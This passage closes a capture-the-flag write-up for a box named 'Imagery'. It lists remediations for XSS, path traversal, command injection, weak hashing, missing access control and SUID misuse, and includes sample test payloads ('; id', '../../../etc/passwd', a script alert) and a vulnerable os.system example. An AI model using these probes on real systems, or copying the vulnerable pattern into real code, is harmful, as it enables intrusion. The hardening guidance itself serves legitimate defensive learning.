<h4 id="root-flag"><strong>Root Flag</strong><a class="headerlink" href="#root-flag" title="Permanent link">&para;</a></h4>
<div class="highlight"><pre><span></span><code>root@imagery:~#<span class="w"> </span>cat<span class="w"> </span>/root/root.txt
<span class="o">[</span>ROOT_FLAG_REDACTED<span class="o">]</span>
</code></pre></div>
<hr />
<h2 id="5-remediation-hardening-proposals">5. Remediation &amp; Hardening (Proposals)<a class="headerlink" href="#5-remediation-hardening-proposals" title="Permanent link">&para;</a></h2>
<h3 id="51-mitigation-of-identified-vulnerabilities">5.1 Mitigation of Identified Vulnerabilities<a class="headerlink" href="#51-mitigation-of-identified-vulnerabilities" title="Permanent link">&para;</a></h3>
<h4 id="511-cross-site-scripting-xss-owasp-a072021"><strong>5.1.1 Cross-Site Scripting (XSS) – OWASP A07:2021</strong><a class="headerlink" href="#511-cross-site-scripting-xss-owasp-a072021" title="Permanent link">&para;</a></h4>
<p><strong>Primary Remediation:</strong>
- Implement Content Security Policy (CSP) header at the application level:
  <div class="highlight"><pre><span></span><code><span class="err">Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; object-src &#39;none&#39;;</span>
</code></pre></div>
- Sanitize ALL user input using a reliable library (e.g., <code>bleach</code> for Python):
  <div class="highlight"><pre><span></span><code><span class="kn">from</span><span class="w"> </span><span class="nn">bleach</span><span class="w"> </span><span class="kn">import</span> <span class="n">clean</span>
<span class="n">user_input</span> <span class="o">=</span> <span class="n">clean</span><span class="p">(</span><span class="n">user_submission</span><span class="p">,</span> <span class="n">tags</span><span class="o">=</span><span class="p">[],</span> <span class="n">strip</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
</code></pre></div>
- Implement HTTP-only flag on session cookies:
  <div class="highlight"><pre><span></span><code><span class="n">app</span><span class="o">.</span><span class="n">config</span><span class="p">[</span><span class="s1">&#39;SESSION_COOKIE_HTTPONLY&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">app</span><span class="o">.</span><span class="n">config</span><span class="p">[</span><span class="s1">&#39;SESSION_COOKIE_SECURE&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span>  <span class="c1"># HTTPS only</span>
</code></pre></div></p>
<p><strong>Verification Check:</strong>
- Penetration test with a common XSS payload (e.g., <code>&lt;script&gt;alert('xss')&lt;/script&gt;</code>) → Must not execute</p>
<hr />
<h4 id="512-local-file-inclusion-lfi-owasp-a012021-cwe-22"><strong>5.1.2 Local File Inclusion (LFI) – OWASP A01:2021 / CWE-22</strong><a class="headerlink" href="#512-local-file-inclusion-lfi-owasp-a012021-cwe-22" title="Permanent link">&para;</a></h4>
<p><strong>Primary Remediation:</strong>
- Implement a <strong>hardcoded whitelist</strong> of allowed files:
  <div class="highlight"><pre><span></span><code><span class="n">ALLOWED_LOGS</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">&#39;admin&#39;</span><span class="p">:</span> <span class="s1">&#39;/var/logs/admin.log&#39;</span><span class="p">,</span>
    <span class="s1">&#39;system&#39;</span><span class="p">:</span> <span class="s1">&#39;/var/logs/system.log&#39;</span><span class="p">,</span>
    <span class="s1">&#39;audit&#39;</span><span class="p">:</span> <span class="s1">&#39;/var/logs/audit.log&#39;</span>
<span class="p">}</span>

<span class="n">requested_file</span> <span class="o">=</span> <span class="n">ALLOWED_LOGS</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">args</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;file&#39;</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">requested_file</span><span class="p">:</span>
    <span class="n">abort</span><span class="p">(</span><span class="mi">403</span><span class="p">)</span>
</code></pre></div>
- <strong>Never</strong> concatenate input directly into file paths</p>
<p><strong>Verification Check:</strong>
- Attempt path traversal (<code>../../../etc/passwd</code>) → Must fail with 403</p>
<hr />
<h4 id="513-os-command-injection-owasp-a032021-cwe-78"><strong>5.1.3 OS Command Injection – OWASP A03:2021 / CWE-78</strong><a class="headerlink" href="#513-os-command-injection-owasp-a032021-cwe-78" title="Permanent link">&para;</a></h4>
<p><strong>Primary Remediation (MANDATORY):</strong>
- <strong>Avoid <code>os.system()</code> / <code>shell=True</code></strong> – Use <code>subprocess</code> with <code>shell=False</code>:
  <div class="highlight"><pre><span></span><code><span class="c1"># VULNERABLE ❌</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="sa">f</span><span class="s2">&quot;convert </span><span class="si">{</span><span class="n">image_path</span><span class="si">}</span><span class="s2"> -crop </span><span class="si">{</span><span class="n">crop</span><span class="si">}</span><span class="s2">&quot;</span><span class="p">)</span>

<span class="c1"># SECURE ✓</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span>
    <span class="s1">&#39;convert&#39;</span><span class="p">,</span> <span class="n">image_path</span><span class="p">,</span>
    <span class="s1">&#39;-crop&#39;</span><span class="p">,</span> <span class="n">crop_string</span>
<span class="p">],</span> <span class="n">check</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
</code></pre></div>
- Input validation with restricted whitelist (numbers only for crop params):
  <div class="highlight"><pre><span></span><code><span class="n">crop_params</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s1">&#39;crop_params&#39;</span><span class="p">]]</span>  <span class="c1"># Force integer</span>
</code></pre></div></p>
<p><strong>Verification Check:</strong>
- Classic command injection (<code>; id</code>) → Must not execute</p>
<hr />
<h4 id="514-weak-password-storage-cwe-916"><strong>5.1.4 Weak Password Storage – CWE-916</strong><a class="headerlink" href="#514-weak-password-storage-cwe-916" title="Permanent link">&para;</a></h4>
<p><strong>Primary Remediation:</strong>
- Eliminate MD5: implement <strong>PBKDF2 / bcrypt / Argon2</strong>:
  <div class="highlight"><pre><span></span><code><span class="kn">from</span><span class="w"> </span><span class="nn">werkzeug.security</span><span class="w"> </span><span class="kn">import</span> <span class="n">generate_password_hash</span><span class="p">,</span> <span class="n">check_password_hash</span>

<span class="n">password_hash</span> <span class="o">=</span> <span class="n">generate_password_hash</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">method</span><span class="o">=</span><span class="s1">&#39;pbkdf2:sha256&#39;</span><span class="p">)</span>
</code></pre></div>
- Database: apply automatic <strong>salting</strong> (standard in werkzeug)</p>
<hr />
<h4 id="515-unauthorized-admin-access-cwe-639"><strong>5.1.5 Unauthorized Admin Access – CWE-639</strong><a class="headerlink" href="#515-unauthorized-admin-access-cwe-639" title="Permanent link">&para;</a></h4>
<p><strong>Primary Remediation:</strong>
- Implement <strong>role-based access control (RBAC)</strong>:
  <div class="highlight"><pre><span></span><code><span class="nd">@app</span><span class="o">.</span><span class="n">route</span><span class="p">(</span><span class="s1">&#39;/admin&#39;</span><span class="p">)</span>
<span class="k">def</span><span class="w"> </span><span class="nf">admin_panel</span><span class="p">():</span>
    <span class="k">if</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;role&#39;</span><span class="p">)</span> <span class="o">!=</span> <span class="s1">&#39;admin&#39;</span><span class="p">:</span>
        <span class="n">abort</span><span class="p">(</span><span class="mi">403</span><span class="p">,</span> <span class="s2">&quot;Insufficient privileges&quot;</span><span class="p">)</span>
</code></pre></div>
- Add logging of ALL admin actions for audit</p>
<hr />
<h4 id="516-sudo-misuse-cwe-269"><strong>5.1.6 Sudo Misuse – CWE-269</strong><a class="headerlink" href="#516-sudo-misuse-cwe-269" title="Permanent link">&para;</a></h4>
<p><strong>Primary Remediation:</strong>
- Revoke unnecessary SUID bits:
  <div class="highlight"><pre><span></span><code>chmod<span class="w"> </span>-s<span class="w"> </span>/usr/local/bin/charcol
</code></pre></div>
- If needed, implement <strong>cronjobs with restricted execution</strong> (e.g., only during scheduled maintenance, with approval)
- Implement <strong>sudoers logging</strong>:
  <div class="highlight"><pre><span></span><code><span class="c1"># /etc/sudoers</span>
Defaults<span class="w"> </span><span class="nv">logfile</span><span class="o">=</span><span class="s2">&quot;/var/log/sudo.log&quot;</span>
Defaults<span class="w"> </span>log_input,<span class="w"> </span>log_output
</code></pre></div></p>
<hr />
<h3 id="52-compliance-standards-mapping">5.2 Compliance &amp; Standards Mapping<a class="headerlink" href="#52-compliance-standards-mapping" title="Permanent link">&para;</a></h3>
<p><strong>NIST SP 800-115 (Technical Security Testing):</strong>
- SI-2: Flaw Remediation ← SI.C Applied
- SI-6: Security Testing, Monitoring, and Analysis ← SI.C-2
- AC-2: Account Management ← AC.2-2 (Weak password policy)</p>
<p><strong>OWASP SAMM (Security Assurance Maturity Model):</strong>
- <strong>V-SM</strong>: Secure Architecture &amp; Design Review → HIGH priority
- <strong>T-CR</strong>: Code Review for Security Issues → HIGH priority
- <strong>O-PM</strong>: Policy &amp; Compliance Management → MEDIUM priority</p>
<hr />
<h3 id="53-testing-validation-roadmap">5.3 Testing &amp; Validation Roadmap<a class="headerlink" href="#53-testing-validation-roadmap" title="Permanent link">&para;</a></h3>
<table>
<thead>
<tr>
<th>Priority</th>
<th>Control</th>
<th>Testing Method</th>
<th>Expected Result</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>CRITICAL</strong></td>
<td>Input sanitization (XSS/Injection)</td>
<td>Automated SAST, Manual code review</td>
<td>All payloads blocked</td>
</tr>
<tr>
<td><strong>CRITICAL</strong></td>
<td>File access control (LFI)</td>
<td>Burp Suite intruder, manual path traversal</td>
<td>403 on unauthorized paths</td>
</tr>
<tr>
<td><strong>CRITICAL</strong></td>
<td>Command execution isolation</td>
<td>Unit test subprocess calls, no shell=True</td>
<td>All cmds fail without subprocess parameter</td>
</tr>
<tr>
<td><strong>HIGH</strong></td>
<td>Password hashing strength</td>
<td>Test hash cracking (hashcat)</td>
<td>Minimum 8-hour crack time (Argon2)</td>
</tr>
<tr>
<td><strong>HIGH</strong></td>
<td>RBAC enforcement</td>
<td>Manual session hijacking simulation</td>
<td>Privilege escalation impossible</td>
</tr>
<tr>
<td><strong>HIGH</strong></td>
<td>Sudo/SUID auditing</td>
<td><code>find / -perm -4000</code> monthly, sudo log review</td>
<td>No unnecessary SUID bits</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="6-conclusions">6. Conclusions<a class="headerlink" href="#6-conclusions" title="Permanent link">&para;</a></h2>
<p>This assessment demonstrated how <strong>multiple OWASP Top 10 vulnerabilities</strong>, when chained together, can allow a progressive attack spanning from anonymous access to total system compromise. The "Imagery" web application violated core principles of:</p>
<ol>
<li><strong>Input Validation</strong> → Both XSS and Command Injection could have been prevented</li>
<li><strong>Output Encoding</strong> → Failure to neutralize user-controlled data</li>
<li><strong>Least Privilege</strong> → Plain text credentials in the database, unjustified SUID</li>
<li><strong>Access Control</strong> → Absence of RBAC on the admin endpoint</li>
</ol>
<hr />
<p><strong>Final Notes:</strong></p>
<p>This box demonstrates how a cascade of vulnerabilities (XSS → LFI → Credential leak → RCE → Priv escalation) can lead from anonymous access to full root. Mitigation requires fixes at multiple levels: input sanitization, access control, package updates.</p>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      
      <script id="__config" type="application/json">{"annotate": null, "base": "../..", "features": ["navigation.tracking", "navigation.tabs", "navigation.tabs.sticky", "toc.follow", "content.code.copy", "content.code.select", "search.suggest", "search.highlight"], "search": "../../assets/javascripts/workers/search.2c215733.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../assets/javascripts/bundle.79ae519e.min.js"></script>
      
    
  </body>
</html>